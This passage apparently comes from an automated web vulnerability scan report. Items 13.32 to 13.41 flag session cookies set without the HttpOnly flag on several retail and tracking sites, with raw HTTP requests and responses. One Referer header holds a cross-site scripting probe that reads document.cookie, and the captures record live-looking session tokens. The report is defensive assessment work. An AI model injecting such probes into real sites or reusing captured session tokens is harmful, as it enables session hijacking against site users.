Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A16%3A30+AM&SMCID=208; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDQSDCCAAC=NKIDDLHABDBPEELKKKKDDKMA; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.32. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ASPSESSIONIDSQCAACBC. The cookie is the classic ASP session identifier and so contains a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//burp/show/2 HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQCAACBC=ALMEDLHANCEGBMEKJHPFBHLG; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.33. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function. The cookie is also issued without the Secure attribute by an HTTPS page that immediately redirects to a plain-HTTP URL on the same host, so the new session identifier is sent in clear text on the very next request.

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511373000%7C1308103373000%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305513173003%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:47:05 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp?rdir=1A
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=Rjt8NRQJqLlKLY2QvvNl013snyns5JqFczHh6fVfwf3D2h7Zw8bJ!1001950354; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 293

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

13.34. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/browse/Underwater-Equipment/ci/11585/N/4294551294

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID and TS29f0cc. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/browse/Underwater-Equipment/ci/11585/N/4294551294 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; cmTPSet=Y; TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; cmRS=&t1=1305510783215&t2=1305510792033&t3=1305541011993&t4=1305510778300&lti=1305541011993&ln=Underwater&hr=/c/browse/Underwater-Equipment/ci/11585/N/4294551294&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=RootPage.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:16:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=2STpNQ5TWC!-112699937; domain=bhphotovideo.com; path=/
Set-Cookie: TS29f0cc=c688b8f92f50d9b7e80f755703dbb3d6871d7ea6dc67d58e4dd0f99460ac0ec5f5b84ed0b092ce85bc587bdd; Path=/
Content-Length: 37549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!--<meta http-equiv
...[SNIP]...

13.35. http://www.bluefly.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bluefly.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: SSLB, SSRT, TLTHID, TLTSID, JSESSIONID, _714bc2c9, CS_TRACKER_ID and TS18d374. The JSESSIONID cookie appears to contain a session token, and TLTSID and SSID-style names suggest further session identifiers, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that CS_TRACKER_ID is issued with exactly the same value as JSESSIONID but with an expiry in 2079, so a copy of the session identifier is persisted in a long-lived, non-HttpOnly cookie.

Request

GET / HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSRT=6YPQTQA; SSOD=AGHw_gAA

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...

13.36. http://www.brookstone.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brookstone.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID and TS657dfa. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 05:02:49 GMT
Set-Cookie: JSESSIONID=A7CBB8B14AF4D3D7C9E71E4E03DC5C7B; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:02:50 GMT
Set-Cookie: TS657dfa=4cb6f2f3222314ecede9aa2b629210ff8800c36175680b534dd085c960ac0ec5d3282da8; Path=/
Content-Length: 75023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.37. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brookstone.com
Path:   /outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543278247%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3Dworldlandingpage_outdoor_living%257Ccxtopnav1fdt%257Coutdoor_living%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Doutdoor%25252520living%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 13:35:41 GMT
Set-Cookie: JSESSIONID=F1D08AEDE471B4630D873CF1AA19CFA3; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:41 GMT
Set-Cookie: TS657dfa=ae893fcd6f83db1d4dcea9b7b38a4764e754034066e5db8e4dd0fdfd60ac0ec569d69bc7; Path=/
Content-Length: 143902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.38. http://www.footlocker.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.footlocker.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLC=web%2D23; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; NST=2011%2D05%2D15%2020%3A43%3A37; TID=5555%2D37151120432137200525561%2D0; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; cmTPSet=Y; CHOSEN_BANNER_ID=FS/$75; fcspersistslider_click_1=1; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:56 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 01:58:56 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 01:58:56 GMT;path=/
Content-Length: 107727


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Sneakers - Athletic Sho
...[SNIP]...

13.39. http://www.footlocker.com/login/login.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:26 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:26 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:26 GMT;path=/
Content-Length: 196


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no"></iframe>

13.40. http://www.footlocker.com/login/login_forgotpassword.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.footlocker.com
Path:   /login/login_forgotpassword.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/login_forgotpassword.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 2789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

13.41. http://www.footlocker.com/login/login_form.cfm

Summary

